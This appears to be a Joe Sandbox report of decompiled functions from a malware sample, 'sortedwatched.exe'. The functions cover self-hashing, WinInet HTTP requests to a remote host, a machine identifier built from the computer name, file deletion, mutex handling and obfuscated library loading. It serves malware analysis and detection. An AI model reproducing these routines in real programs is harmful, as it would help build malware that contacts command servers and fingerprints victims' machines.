                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleName_snwprintflstrcmpi
                  • String ID: g8Cw
                  • API String ID: 4243820956-3103284439
                  • Opcode ID: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction ID: 96f63cbf6c12603b9eafb981d3b8471d0b236fe68b2e75c18f179b1aecd08856
                  • Opcode Fuzzy Hash: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction Fuzzy Hash: 5F118472600118ABD710AB65DC89AFF377CEB40349F00417AF505A7192EE346E458BA9
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F3C5, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 52fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F3C5() {
				void* _t1;
				void* _t2;
				int _t3;
				void* _t4;
				void* _t10;
				void* _t12;
				void* _t14;

				_t1 = CreateFileW("C:\Windows\system32\sortedwatched.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t14 = _t1;
				if(_t14 != 0xffffffff) {
					_t2 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0); // executed
					_t12 = _t2;
					if(_t12 != 0) {
						_t4 = MapViewOfFile(_t12, 4, 0, 0, 0); // executed
						_t10 = _t4;
						if(_t10 != 0) {
							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
							UnmapViewOfFile(_t10);
						}
						CloseHandle(_t12); // executed
					}
					_t3 = CloseHandle(_t14); // executed
					return _t3;
				}
				return _t1;
			}










                  0x0040f3da
                  0x0040f3e0
                  0x0040f3e5
                  0x0040f3ef
                  0x0040f3f5
                  0x0040f3f9
                  0x0040f401
                  0x0040f407
                  0x0040f40b
                  0x0040f421
                  0x0040f426
                  0x0040f426
                  0x0040f42d
                  0x0040f42d
                  0x0040f434
                  0x00000000
                  0x0040f43a
                  0x0040f43d

                  APIs
                  • CreateFileW.KERNEL32(C:\Windows\system32\sortedwatched.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNEL32(00000000), ref: 0040F42D
                  • CloseHandle.KERNEL32(00000000), ref: 0040F434
                  Strings
                  • C:\Windows\system32\sortedwatched.exe, xrefs: 0040F3D5
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 3664593344-2966989349
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F3C5, Relevance: 12.1, APIs: 8, Instructions: 52fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F3C5() {
				void* _t1;
				void* _t2;
				int _t3;
				void* _t4;
				void* _t10;
				void* _t12;
				void* _t14;

				_t1 = CreateFileW(0x416c50, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t14 = _t1;
				if(_t14 != 0xffffffff) {
					_t2 = CreateFileMappingW(_t14, 0, 2, 0, 0, 0); // executed
					_t12 = _t2;
					if(_t12 != 0) {
						_t4 = MapViewOfFile(_t12, 4, 0, 0, 0); // executed
						_t10 = _t4;
						if(_t10 != 0) {
							 *0x41574c = RtlComputeCrc32(0, _t10, GetFileSize(_t14, 0));
							UnmapViewOfFile(_t10);
						}
						CloseHandle(_t12); // executed
					}
					_t3 = CloseHandle(_t14); // executed
					return _t3;
				}
				return _t1;
			}










                  0x0040f3da
                  0x0040f3e0
                  0x0040f3e5
                  0x0040f3ef
                  0x0040f3f5
                  0x0040f3f9
                  0x0040f401
                  0x0040f407
                  0x0040f40b
                  0x0040f421
                  0x0040f426
                  0x0040f426
                  0x0040f42d
                  0x0040f42d
                  0x0040f434
                  0x00000000
                  0x0040f43a
                  0x0040f43d

                  APIs
                  • CreateFileW.KERNEL32(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                  • GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                  • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                  • UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                  • CloseHandle.KERNEL32(00000000), ref: 0040F42D
                  • CloseHandle.KERNEL32(00000000), ref: 0040F434
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$ComputeCrc32MappingSizeUnmap
                  • String ID:
                  • API String ID: 3664593344-0
                  • Opcode ID: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction ID: 4f8756942f13f85b051569e497b215ae0a3eeb64e29cb283b43bbd1ff795de01
                  • Opcode Fuzzy Hash: 65ce3e772657a82cdf5a647400a3b71ec0d1d40d41c4253f67068543f92dbf8c
                  • Instruction Fuzzy Hash: F60131B22007187FF2211FA4ACCDFFB656CDB85B9BF108135FA11A12D0DAA44D014679
                  Uniqueness

                  Uniqueness Score: 0.14%

                  Function 0040140A, Relevance: 10.6, APIs: 7, Instructions: 90networkUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040140A(WCHAR* __ecx, short __edx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void* _a16, long _a20, intOrPtr _a24) {
				WCHAR* _v8;
				WCHAR* _v12;
				void* _v16;
				WCHAR* _t15;
				void* _t16;
				void* _t19;
				long _t22;
				int _t26;
				void* _t28;
				short _t30;
				void* _t31;
				void* _t32;
				void* _t43;
				WCHAR* _t45;
				WCHAR* _t46;
				void* _t47;

				_t30 = __edx;
				_v8 = __ecx;
				_t15 = E00401345(); // executed
				_t45 = 0;
				_t46 = _t15;
				_v12 = _t46;
				_t16 = InternetOpenW(_t46, 0, 0, 0, 0); // executed
				_v16 = _t16;
				if(_t16 != 0) {
					_t19 = InternetConnectW(_t16, _v8, _t30, 0, 0, 3, 0, 0); // executed
					_t31 = _t19;
					_v8 = _t31;
					if(_t31 != 0) {
						_t47 = E00401A52(0x412050, 0x42b61fdb);
						_t22 = E00401310();
						_t37 =  !=  ? _t47 : 0;
						_t32 = HttpOpenRequestW(_t31,  !=  ? _t47 : 0, _a4, 0, 0, 0, _t22, 0);
						L00401B09(_t47);
						if(_t32 != 0) {
							_t26 = HttpSendRequestW(_t32, _a8, 0xffffffff, _a16, _a20); // executed
							if(_t26 != 0) {
								_t43 = 0x13;
								_t28 = E00401316(_t32, _t43);
								_t54 = _t28 - 0xc8;
								if(_t28 == 0xc8) {
									_t45 = E00401383(_t32, _a24, _t54);
								}
							}
							InternetCloseHandle(_t32); // executed
						}
						InternetCloseHandle(_v8);
						_t46 = _v12;
					}
					InternetCloseHandle(_v16);
				}
				E00401532(_t46);
				return _t45;
			}



















                  0x00401413
                  0x00401415
                  0x00401418
                  0x0040141d
                  0x0040141f
                  0x00401426
                  0x00401429
                  0x0040142f
                  0x00401434
                  0x00401445
                  0x0040144b
                  0x0040144d
                  0x00401452
                  0x00401468
                  0x0040146a
                  0x0040147b
                  0x00401488
                  0x0040148a
                  0x00401491
                  0x0040149f
                  0x004014a7
                  0x004014ab
                  0x004014ae
                  0x004014b3
                  0x004014b8
                  0x004014c4
                  0x004014c4
                  0x004014b8
                  0x004014c7
                  0x004014c7
                  0x004014d0
                  0x004014d6
                  0x004014d6
                  0x004014dc
                  0x004014dc
                  0x004014e4
                  0x004014f1

                  APIs
                    • Part of subcall function 00401345: ObtainUserAgentString.URLMON(00000000,?,00000104), ref: 00401362
                  • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401429
                  • InternetConnectW.WININET(00000000,00000000,A8020050,00000000,00000000,00000003,00000000,00000000), ref: 00401445
                  • HttpOpenRequestW.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401480
                  • HttpSendRequestW.WININET(00000000,000000FF,000000FF,?,?), ref: 0040149F
                  • InternetCloseHandle.WININET(00000000), ref: 004014C7
                    • Part of subcall function 00401316: HttpQueryInfoW.WININET(00000000,00000013,00000000,00000000,00000000), ref: 00401334
                    • Part of subcall function 00401383: InternetReadFile.WININET(?,00000000,00000000,?), ref: 004013CD
                  • InternetCloseHandle.WININET(?), ref: 004014D0
                  • InternetCloseHandle.WININET(?), ref: 004014DC
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequest$AgentConnectFileInfoObtainQueryReadSendStringUser
                  • String ID:
                  • API String ID: 3982590236-0
                  • Opcode ID: 0d54c19cca61c3b923c66ea9474d8b0119caa62e74d77989c331ed76ff960556
                  • Instruction ID: de09d5a240a5615813d0bbbfcfa054314b958373cb91725100eb0eecfb42de7b
                  • Opcode Fuzzy Hash: 0d54c19cca61c3b923c66ea9474d8b0119caa62e74d77989c331ed76ff960556
                  • Instruction Fuzzy Hash: 9E216271A00245FBDF206FA69C49DAF7ABDDBC5760B10813EB905A23A1DA788D508B64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F2EE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 39%
                  			E0040F2EE(void* __eflags) {
				char _v524;
				char _v1044;
				short _v1564;
				char* _t17;
				int _t27;
				void* _t45;
				intOrPtr _t48;

				_t42 = E00401A52(0x412a00, 0x4bf67e71);
				E0040F190( &_v1044, _t9);
				L00401B09(_t42);
				_push( &_v524);
				_push(0);
				_push(0);
				_t48 =  *0x415f4c; // 0x1
				if(_t48 == 0) {
					 *0x414c14(0, 0x1c);
					_t43 = E00401A52(0x412df0, 0x4bf67e71);
					_t17 =  &_v524;
					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
					_t45 = _t45 + 0x14;
					L00401B09(_t43);
				} else {
					 *0x414c14(0, 0x29);
				}
				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
				L00401B09(_t44);
				_t27 = DeleteFileW( &_v1564); // executed
				return _t27;
			}










                  0x0040f30b
                  0x0040f315
                  0x0040f31c
                  0x0040f32c
                  0x0040f32f
                  0x0040f330
                  0x0040f331
                  0x0040f337
                  0x0040f347
                  0x0040f359
                  0x0040f362
                  0x0040f36c
                  0x0040f372
                  0x0040f377
                  0x0040f339
                  0x0040f33c
                  0x0040f33c
                  0x0040f388
                  0x0040f3a1
                  0x0040f3ac
                  0x0040f3b8
                  0x0040f3c4

                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?), ref: 0040F33C
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040F347
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNEL32(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 1341198303-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F43E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 99 40f43e-40f45c GetComputerNameW 100 40f4c8 99->100 101 40f45e-40f498 call 4019ab WideCharToMultiByte call 401b09 99->101 102 40f4ce-40f503 call 4019ab _snprintf call 401b09 100->102 101->100 111 40f49a-40f4a1 101->111 111->102 112 40f4a3-40f4a7 111->112 113 40f4a9-40f4ab 112->113 114 40f4ad-40f4af 112->114 113->114 115 40f4c0-40f4c4 113->115 116 40f4b1-40f4b3 114->116 117 40f4b5-40f4b7 114->117 115->112 120 40f4c6 115->120 116->115 116->117 118 40f4b9-40f4bb 117->118 119 40f4bd 117->119 118->115 118->119 119->115 120->102
                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
				long _v8;
				char _v24;
				short _v56;
				int _t14;
				void* _t15;
				int _t22;
				char _t24;
				char* _t33;

				_v8 = 0x10;
				_t14 = GetComputerNameW( &_v56,  &_v8); // executed
				if(_t14 == 0) {
					L12:
					_v24 = 0x58;
					L13:
					_t15 = E004019AB(0x412e30);
					 *0x414664("813848_3C4E0000", 0x104, _t15,  &_v24,  *0x4164e0);
					return L00401B09(_t15);
				}
				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
				L00401B09(_t19);
				if((0 | _t22 > 0x00000000) == 0) {
					goto L12;
				}
				_t33 =  &_v24;
				if(_v24 == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t24 =  *_t33;
					if(_t24 < 0x30 || _t24 > 0x39) {
						if(_t24 < 0x61 || _t24 > 0x7a) {
							if(_t24 < 0x41 || _t24 > 0x5a) {
								 *_t33 = 0x58;
							}
						}
					}
					_t33 = _t33 + 1;
				} while ( *_t33 != 0);
				goto L13;
			}











                  0x0040f448
                  0x0040f454
                  0x0040f45c
                  0x0040f4c8
                  0x0040f4c8
                  0x0040f4ce
                  0x0040f4d3
                  0x0040f4ef
                  0x0040f503
                  0x0040f503
                  0x0040f481
                  0x0040f490
                  0x0040f498
                  0x00000000
                  0x00000000
                  0x0040f49e
                  0x0040f4a1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a7
                  0x0040f4af
                  0x0040f4b7
                  0x0040f4bd
                  0x0040f4bd
                  0x0040f4b7
                  0x0040f4af
                  0x0040f4c0
                  0x0040f4c1
                  0x00000000

                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: 813848_3C4E0000$X
                  • API String ID: 4080658169-2762417543
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 12.89%

                  Function 0040C601, Relevance: 7.5, APIs: 5, Instructions: 40synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040C601(void* __eflags) {
				void* _t1;
				long _t3;
				void* _t4;
				long _t8;
				int _t13;

				_t13 = 0; // executed
				_t1 = E0040C4F5(__eflags); // executed
				if(_t1 == 0) {
					L10:
					return _t13;
				}
				_t3 = WaitForSingleObject( *0x41548c, 0);
				if(_t3 == 0) {
					L3:
					_t4 = E0040C54E(_t17); // executed
					_t18 = _t4;
					if(_t4 != 0 && E0040C5A7(_t18) != 0) {
						_t8 = SignalObjectAndWait( *0x414e6c,  *0x41365c, 0xffffffff, _t13);
						if(_t8 == 0 || _t8 == 0x80) {
							_t13 = ResetEvent( *0x414e6c);
						}
					}
					ReleaseMutex( *0x41548c);
					CloseHandle( *0x41548c); // executed
					L9:
					goto L10;
				}
				_t17 = _t3 - 0x80;
				if(_t3 != 0x80) {
					goto L9;
				}
				goto L3;
			}








                  0x0040c602
                  0x0040c604
                  0x0040c60b
                  0x0040c67e
                  0x0040c681
                  0x0040c681
                  0x0040c615
                  0x0040c622
                  0x0040c628
                  0x0040c628
                  0x0040c62d
                  0x0040c62f
                  0x0040c649
                  0x0040c651
                  0x0040c663
                  0x0040c663
                  0x0040c651
                  0x0040c66b
                  0x0040c677
                  0x0040c67d
                  0x00000000
                  0x0040c67d
                  0x0040c624
                  0x0040c626
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                    • Part of subcall function 0040C4F5: _snwprintf.NTDLL ref: 0040C51D
                    • Part of subcall function 0040C4F5: CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C535
                  • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                  • ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                  • ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                  • CloseHandle.KERNEL32 ref: 0040C677
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle_snwprintf
                  • String ID:
                  • API String ID: 2255288334-0
                  • Opcode ID: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction ID: c0f7c5306684621e6a4500821fb11e6ef7d6b4f9c1040e922aa21da158988458
                  • Opcode Fuzzy Hash: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction Fuzzy Hash: 6AF03631544110DBDF312F76FC48A9A7A55AB45752714C736F801E12F0EA36C9109A5C
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 00408922, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 120libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E00408922(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				char _v388;
				struct HINSTANCE__* _t99;

				_v388 = 0xbe363562;
				_v384 = 0x358c1795;
				_v380 = 0xfc3978bd;
				_v376 = 0x5e88d697;
				_v372 = 0x1994d9f1;
				_v368 = 0x74012195;
				_v364 = 0x24e0d58c;
				_v360 = 0x21725a8d;
				_v356 = 0xa874821;
				_v352 = 0x8f4bb96f;
				_v348 = 0x7b30fa17;
				_v344 = 0x7ea7edad;
				_v340 = 0x48c44d52;
				_v336 = 0x2e75da4f;
				_v332 = 0x5ea70e4c;
				_v328 = 0x7310b874;
				_v324 = 0x673afa7a;
				_v320 = 0x7d7fe55;
				_v316 = 0x71d3ba3c;
				_v312 = 0x27174315;
				_v308 = 0xffc65c5a;
				_v304 = 0x71edd81f;
				_v300 = 0x88b5759d;
				_v296 = 0xa46eb22d;
				_v292 = 0x4e080454;
				_v288 = 0x773882f0;
				_v284 = 0x301340;
				_v280 = 0x27b6a846;
				_v276 = 0xd1630644;
				_v272 = 0x4beaf5bf;
				_v268 = 0x430858d;
				_v264 = 0xf02d0ada;
				_v260 = 0x21f77905;
				_v256 = 0xebc6db18;
				_v252 = 0x25fcc715;
				_v248 = 0x1f40551f;
				_v244 = 0xd9b12e44;
				_v240 = 0x41ea523d;
				_v236 = 0xeff774de;
				_v232 = 0x7e0b9da5;
				_v228 = 0x8adb486a;
				_v224 = 0xf7243b6d;
				_v220 = 0x2b80910;
				_v216 = 0xca5e3015;
				_v212 = 0x635d5a6e;
				_v208 = 0x46d9f790;
				_v204 = 0xd87c8cb3;
				_v200 = 0x3b391a04;
				_v196 = 0x80154553;
				_v192 = 0x26d9aa35;
				_v188 = 0xa780316d;
				_v184 = 0xcc58666d;
				_v180 = 0x1546d742;
				_v176 = 0xb874fe62;
				_v172 = 0x7dab30d9;
				_v168 = 0xae3670f3;
				_v164 = 0x2d39e7a8;
				_v160 = 0xc90b32b4;
				_v156 = 0xf86c708b;
				_v152 = 0x3d938887;
				_v148 = 0x857eaf68;
				_v144 = 0x4675d760;
				_v140 = 0x91021cb0;
				_v136 = 0x1e139331;
				_v132 = 0x9c4df91c;
				_v128 = 0xbf70c7da;
				_v124 = 0x1868d50e;
				_v120 = 0xaaeeea7a;
				_v116 = 0x676c626a;
				_v112 = 0x459ef5d;
				_v108 = 0xf6552739;
				_v104 = 0x628c522d;
				_v100 = 0x5094f550;
				_v96 = 0xdc8a394;
				_v92 = 0x753b5f8f;
				_v88 = 0xbcfd75c5;
				_v84 = 0xc39d1db2;
				_v80 = 0xfc32ffd;
				_v76 = 0xd8b5f26a;
				_v72 = 0xad049b88;
				_v68 = 0xaacdb83e;
				_v64 = 0x7a9519fc;
				_v60 = 0xa3bb9731;
				_v56 = 0x4be3cd7a;
				_v52 = 0xeb2ea36c;
				_v48 = 0xec09d4a5;
				_v44 = 0xf4140a91;
				_v40 = 0xb1a460b0;
				_v36 = 0x6fde7de0;
				_v32 = 0x1da135a9;
				_v28 = 0x1a3a8662;
				_v24 = 0xfe2095d7;
				_v20 = 0xf2fd9e2f;
				_v16 = 0xe2f8a12;
				_v12 = 0x2f79a8a3;
				_v8 = 0x33205105;
				_t107 = E00401A52(0x412780, 0x72fc3a35);
				_t99 = LoadLibraryW(_t98); // executed
				 *0x4164f0 = _t99;
				L00401B09(_t107);
				_push(0x413660);
				_push(0x3ccd278a);
				return E004012FF( *0x4164f0,  &_v388, 0x60);
			}




































































































                  0x0040892c
                  0x00408936
                  0x00408940
                  0x0040894a
                  0x00408954
                  0x0040895e
                  0x00408968
                  0x00408972
                  0x0040897c
                  0x00408986
                  0x00408990
                  0x0040899a
                  0x004089a4
                  0x004089ae
                  0x004089b8
                  0x004089c2
                  0x004089cc
                  0x004089d6
                  0x004089e0
                  0x004089ea
                  0x004089f4
                  0x004089fe
                  0x00408a08
                  0x00408a12
                  0x00408a1c
                  0x00408a26
                  0x00408a30
                  0x00408a3a
                  0x00408a44
                  0x00408a4e
                  0x00408a58
                  0x00408a62
                  0x00408a6c
                  0x00408a76
                  0x00408a80
                  0x00408a8a
                  0x00408a94
                  0x00408a9e
                  0x00408aa8
                  0x00408ab2
                  0x00408abc
                  0x00408ac6
                  0x00408ad0
                  0x00408ada
                  0x00408ae4
                  0x00408aee
                  0x00408af8
                  0x00408b02
                  0x00408b0c
                  0x00408b16
                  0x00408b20
                  0x00408b2a
                  0x00408b34
                  0x00408b3e
                  0x00408b48
                  0x00408b52
                  0x00408b5c
                  0x00408b66
                  0x00408b70
                  0x00408b7a
                  0x00408b84
                  0x00408b8e
                  0x00408b98
                  0x00408ba2
                  0x00408bac
                  0x00408bb3
                  0x00408bba
                  0x00408bc1
                  0x00408bc8
                  0x00408bcf
                  0x00408bd6
                  0x00408bdd
                  0x00408be4
                  0x00408beb
                  0x00408bf2
                  0x00408bf9
                  0x00408c00
                  0x00408c07
                  0x00408c0e
                  0x00408c15
                  0x00408c21
                  0x00408c2d
                  0x00408c34
                  0x00408c3b
                  0x00408c42
                  0x00408c49
                  0x00408c50
                  0x00408c57
                  0x00408c5e
                  0x00408c65
                  0x00408c6c
                  0x00408c73
                  0x00408c7a
                  0x00408c81
                  0x00408c88
                  0x00408c8f
                  0x00408c9b
                  0x00408c9e
                  0x00408ca6
                  0x00408cab
                  0x00408cbc
                  0x00408cc1
                  0x00408cd4

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00408C9E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: =RA$jblg$nZ]c
                  • API String ID: 1029625771-130541845
                  • Opcode ID: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
                  • Instruction ID: e7cc7c87ab767eb4a20ce2cf539689b4304f70dc4dd1bc1fd0241874581f8c7a
                  • Opcode Fuzzy Hash: 1b1ed6e085e12f066a49fdef08a2a82bb6068c6974effbf6941084d5ca8307fb
